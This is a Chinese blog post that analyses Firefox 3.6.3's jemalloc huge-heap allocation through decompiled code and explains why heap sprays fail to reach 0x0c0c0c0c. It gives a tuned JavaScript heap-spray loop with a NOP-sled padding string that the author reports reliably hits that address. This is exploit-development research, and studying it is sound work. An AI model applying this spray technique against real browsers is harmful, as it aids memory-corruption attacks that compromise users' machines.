火狐3.6.3 huge heap malloc

最新推荐文章于 2024-09-06 22:49:11 发布
最新推荐文章于 2024-09-06 22:49:11 发布
阅读量649 收藏
点赞数
分类专栏: 漏洞分析 文章标签: c class insert tree java 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/instruder/article/details/6911937
版权

关键词:堆喷射 为什么火狐3.6.3以后喷不到0c0c0c0c?


对于http://www.exploit-db.com/exploits/17974/ 这个火狐的整数溢出的poc在火狐3.6.16上面可以正常运行

但是在火狐3.6.3及其以后的版本堆喷射死活喷不到0x0c0c0c0c处。


原因有两个:

1 火狐的huge堆分配内存对齐

火狐的堆分成三类:

 *   |=====================================|
 *   | Category | Subcategory    |    Size |
 *   |=====================================|
 *   | Small    | Tiny           |       2 |
 *   |          |                |       4 |
 *   |          |                |       8 |
 *   |          |----------------+---------|
 *   |          | Quantum-spaced |      16 |
 *   |          |                |      32 |
 *   |          |                |      48 |
 *   |          |                |     ... |
 *   |          |                |     480 |
 *   |          |                |     496 |
 *   |          |                |     512 |
 *   |          |----------------+---------|
 *   |          | Sub-page       |    1 kB |
 *   |          |                |    2 kB |
 *   |=====================================|
 *   | Large                     |    4 kB |
 *   |                           |    8 kB |
 *   |                           |   12 kB |
 *   |                           |     ... |
 *   |                           | 1012 kB |
 *   |                           | 1016 kB |
 *   |                           | 1020 kB |
 *   |=====================================|
 *   | Huge                      |    1 MB |
 *   |                           |    2 MB |
 *   |                           |    3 MB |
 *   |                           |     ... |
 *   |=====================================|

huge堆的分配代码:

void *__cdecl malloc(unsigned int size)
{
  signed int alloc_size; // esi@1
  arena_s *arena; // eax@4
  void *result; // eax@7
  int v4; // ST08_4@9

  alloc_size = size;
  if ( !size )
    alloc_size = 1;
  if ( alloc_size > arena_maxclass )            // static size_t           arena_maxclass; /* Max size class for arenas. */
  {                                             // 000ff000
    result = huge_malloc(alloc_size, v4);
  }
  else
  {
    arena = (arena_s *)TlsGetValue(tlsIndex);
    if ( !arena )
      arena = choose_arena_hard();
    if ( alloc_size > bin_maxclass )            // static size_t           bin_maxclass; /* Max size class for bins. */
      result = arena_malloc_large(arena, alloc_size, 0);// 800
    else
      result = arena_malloc_small(arena, alloc_size, 0);
  }
  if ( !result )
    *_errno() = 0xCu;
  return result;
}

void *__usercall huge_malloc<eax>(unsigned int size<eax>, int zero)
{
  unsigned int csize; // ebx@1
  unsigned int v3; // esi@1
  void *result; // eax@2
  void *v5; // edi@3
  int v6; // edi@3
  void *v7; // ebp@5
  int v8; // ebp@5
  unsigned int v9; // esi@7
  int v10; // [sp-4h] [bp-Ch]@3

  v3 = size;
  csize = ~chunksize_mask & (chunksize_mask + size);
  if ( ~chunksize_mask & (chunksize_mask + size) )
  {
    v10 = v6;
    result = base_node_alloc();
    v5 = result;
    if ( result )
    {
      v7 = chunk_alloc(csize, v8, v10);
      if ( v7 )
      {
        v9 = ~pagesize_mask & (pagesize_mask + v3);
        *((_DWORD *)v5 + 4) = v7;
        *((_DWORD *)v5 + 5) = v9;
        EnterCriticalSection(&huge_mtx);
        extent_tree_ad_insert(&huge, (extent_node_s *)v5);
        ++huge_nmalloc;
        huge_allocated += v9;
        LeaveCriticalSection(&huge_mtx);
        if ( csize != v9 )
          VirtualFree((char *)v7 + v9, csize - v9, 0x4000u);
        result = v7;
      }
      else
      {
        EnterCriticalSection(&base_mtx);
        *(_DWORD *)v5 = base_nodes;
        base_nodes = (extent_node_s *)v5;
        LeaveCriticalSection(&base_mtx);
        result = 0;
      }
    }
  }
  else
  {
    result = 0;
  }
  return result;
}

void *__usercall chunk_alloc<eax>(unsigned int size<eax>, int zero, int pagefile)
{
  unsigned int v3; // edi@1
  void *v4; // esi@1
  int v5; // ST0C_4@1
  void *result; // eax@8

  v3 = size;
  v4 = chunk_alloc_mmap(size, v5);
  if ( v4 )
    stats_chunks.curchunks += v3 / chunksize;
  if ( stats_chunks.curchunks > stats_chunks.highchunks )
    stats_chunks.highchunks = stats_chunks.curchunks;
  if ( v4 && malloc_rtree_set(chunk_rtree, (unsigned int)v4, v4) )
  {
    chunk_dealloc(v4, v3);
    result = 0;
  }
  else
  {
    result = v4;
  }
  return result;
}


void *__usercall chunk_alloc_mmap<eax>(unsigned int size<edi>, int pagefile)
{
  void *result; // eax@1
  void *v3; // esi@1
  unsigned int v4; // ebx@2
  unsigned int v5; // ebx@2
  void *v6; // eax@4
  unsigned int v7; // ebx@5
  void *v8; // [sp-14h] [bp-1Ch]@9
  unsigned int v9; // [sp-4h] [bp-Ch]@2

  result = VirtualAlloc(0, size, 0x3000u, 4u);
  v3 = result;
  if ( result )
  {
    v9 = v5;
    v4 = (unsigned int)result & chunksize_mask;
    if ( !((unsigned int)result & chunksize_mask)
      || (pages_unmap(result, v9), (v3 = VirtualAlloc(v3 + size - v4, size, 0x3000u, 4u)) != 0) )
    {
RETURN:
      stats_chunks.nchunks += size / chunksize;
    }
    else
    {
      while ( 1 )
      {
        v6 = VirtualAlloc(0, size + chunksize, 0x3000u, 4u);
        v3 = v6;
        if ( !v6 )
          break;
        v7 = (unsigned int)v6 & chunksize_mask;
        if ( !VirtualFree(v6, 0, 0x8000u) )
        {
          malloc_message("<jemalloc>", ": (malloc) Error in VirtualFree()\n", &p2, &p2);
          if ( opt_abort )
            abort();
        }
        if ( v7 )
          v8 = (char *)v3 + chunksize - v7;
        else
          v8 = v3;
        v3 = VirtualAlloc(v8, size, 0x3000u, 4u);
        if ( v3 )
          goto RETURN;
      }
    }
    result = v3;
  }
  return result;
}


可以看到huge 堆是直接分配的,并未做什么限制,主要就是内存对齐

很多的利用poc都是这样写的喷射循环:

 while(tr_padding.length < 0x80000) {tr_padding += tr_padding;}


这样写其实是有问题的,并不能分配刚好小于0x80000的内存,可能是0x80000*2的内存,而由于内存对齐的缘故,

每次分配都是0x100000大小的内存对齐,如从0x0b000000开始分配,每次分配0xFFFFF的大小内存就会是这样的

内存分配:0x0b000000 0x0b100000 0x0b200000 0x0b300000 0x0b400000 .......每次递增0x100000

但是要是每次分配不止0x100000,则可能每次分配的内存之间间隙就会过大,很有可能就不好分配占据0x0c0c0c0c

这个地址。


这样的写法貌似可以每次递增0x100000的分配内存

var container = new Array();
var padd1 =  unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"); 
	var big =padd1;  
	var totallen=0x100000-padd1.length*2;      
	while (big.length < totallen/2)
	{

		big += padd1;
	
	}

这样我测试在xp下 火狐3.6.3每次都可以喷到0x0c0c0c0c处。


2 这个poc利用了java来过rop,引用后,火狐在对喷射之前就已经占据了0x0cxxxxxx部分内存,导致不会从这里开始

分配大块内存,可能从0x0e000000 0x0e100000 ....0x0f000000处开始分配。


instruder
关注
专栏目录
windows下maven 3.6.3安装教程
zhengzaifeidelushang的博客
03-23 1184
官网下载地址:https://maven.apache.org/download.cgi 下载有binary和source的两个版本,binary是编译好的可以直接使用,source是还没编译过的源代码 解压安装包 配置环境变量 系统变量path设置路径 命令行执行命令mvn -v 如下所示,则安装成功 ...
Firefox_3.6.3
04-11
**Firefox 3.6.3** 是Mozilla Firefox浏览器的一个旧版本,发布于2010年,它在当时是用户广泛使用的网页浏览工具。Firefox以其开源、自由、安全和高度可定制的特点,深受全球用户的喜爱。这个特定版本的Firefox包含...
firefox-3.6.3.source.tar.bz2
11-23
firefox-3.6.3.source.tar.bz2firefox-3.6.3.source.tar.bz2
火狐浏览器中国版3.6.3
04-13
最新的火狐浏览器中国版 强大的魔镜功能 以及各种各样的插件,让你上网High个够……
Firefox火狐浏览器官方3.6.3plugin1-mac版本dmg安装包
12-29
资源全名:Firefox 3.6.3plugin1.dmg
Firefox火狐浏览器官方3.6.3-win32版本exe安装包
12-24
解压后可用,资源全名:Firefox Setup 3.6.3.exe
Firefox 3.6.3版率先修复黑客大赛所曝漏洞
weixin_34306676的博客
09-24 64
火狐(Firefox)浏览器开发商Mozilla上周四晚些时候发布了火狐3.6.3版,该升级版修复了Pwn2Own全球黑客大赛中发现的一个危急技术漏洞。 在上周举行的Pwn2Own黑客大赛中,来自德国的参赛者“Nils”攻破了在Windows 7操作系统中运行的火狐3.6.2版,所获奖金为1万美元。从Nils发现该漏洞到Mozilla发布修复该漏洞的火狐3.6.3版,仅用了8天时间。在 去年Pw...
怎么下python3.6.3_Linux安装python3.6.3
weixin_39710660的博客
12-04 283
一:(1)wget https://www.python.org/ftp/python/3.6.3/Python-3.6.3.tgz  下载安装包 (可以到网站下载,然后上传到Linux)(2)tar zxvf Python-3.6.3.tgz  解压安装包(3)cd Python-3.6.3   转到该安装包目录下(4)./configure --prefix=/usr/local/python...
firefox中国版3.6.3下安装CSSviewer
liyifei21的专栏
05-08 1576
怎么安装python3.6.3_linux服务器上安装python 3.6.3
weixin_39690105的博客
12-04 147
一.下载源码包地址https://www.python.org/ftp/python/3.6.3/Python-3.6.3.tar.xz二.解压源码包1.下载解压工具xz#yum -y install search xz2.解压#xz -dPython-3.6.3.tar.xz#tar -xfPython-3.6.3.tar三.安装依赖文件yum -y install zlib-devel ...
Firefox火狐浏览器官方3.6.3plugin1-win32版本exe安装包
12-24
《Firefox火狐浏览器3.6.3plugin1-win32版本安装详解》 Firefox火狐浏览器,作为全球知名的开源浏览器,以其高度定制性、安全性和稳定性深受用户喜爱。本资源提供的"Firefox火狐浏览器官方3.6.3plugin1-win32版本...
Firefox火狐浏览器官方3.6.3-mac版本dmg安装包
12-27
总结来说,"Firefox火狐浏览器官方3.6.3-mac版本dmg安装包"是一个专为Mac用户设计的早期Firefox版本,它带来了诸多安全和性能提升,但在当前环境下,可能需要考虑升级以获得最新的功能和安全补丁。
AndroidStudio3.6.3新版本遇到的坑
u012384954的专栏
05-13 3149
安装了as3.6.3新版本,遇到的坑,搞了一天半,终于解决。 问题: 1)org.gradle.api.internal.artifacts.ivyservice.DefaultLenientConfiguration$ArtifactResolveException: Couldnotresolveallartifactsforconfiguration':compiler:classpath'. 2)Gradle Download klin-compiler eded-abl3.1J...
ZooKeeper 3.6.3 安装与使用文档超详细图文步骤
蜗牛的博客
08-24 1573
1、简介 1.1、概述 HBase是一个分布式的、面向列的开源数据库,该技术来源于 Fay Chang 所撰写的Google论文“Bigtable:一个结构化数据的分布式存储系统”。就像Bigtable利用了Google文件系统(File System)所提供的分布式数据存储一样,HBase在Hadoop之上提供了类似于Bigtable的能力。HBase是Apache的Hadoop项目的子项目。HBase不同于一般的关系数据库,它是一个适合于非结构化数据存储的数据库。另一个不同的是HBase基于列的而不是基
Maven 3.6.3 安装包
最新发布
gitblog_09720的博客
09-06 448
Maven 3.6.3 安装包 maven3.6.3.zip项目地址:https://gitcode.com/open-source-toolkit/8f618 概述 本仓库提供了Apache Maven 3.6.3版本的二进制压缩包,用于方便开发者快速下载和搭建Maven环境。Maven是一个项目管理和自动构建工具,广泛应用于Java项目中,它帮助简化项目的构建过程,统一管理项目依赖,提高开发...
python3.6.3安装过程_python3.6.3安装图文教程 TensorFlow安装配置方法
weixin_39955142的博客
11-20 538
本文主要介绍Python3.6及TensorFlow的安装和配置流程。一、Python官网下载自己电脑和系统对应的Python安装包。一直往下拉到Files,这里我下载的是Windows x86-64 executable installer(注意:要装TensorFlow必须安装64位的Python,TensorFlow不支持32位)...
怎么解决name 'Tkinter' is not defined 问题
热门推荐
爱杀之爪的矩阵
11-26 2万+
解决name 'Tkinter' is not defined   
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值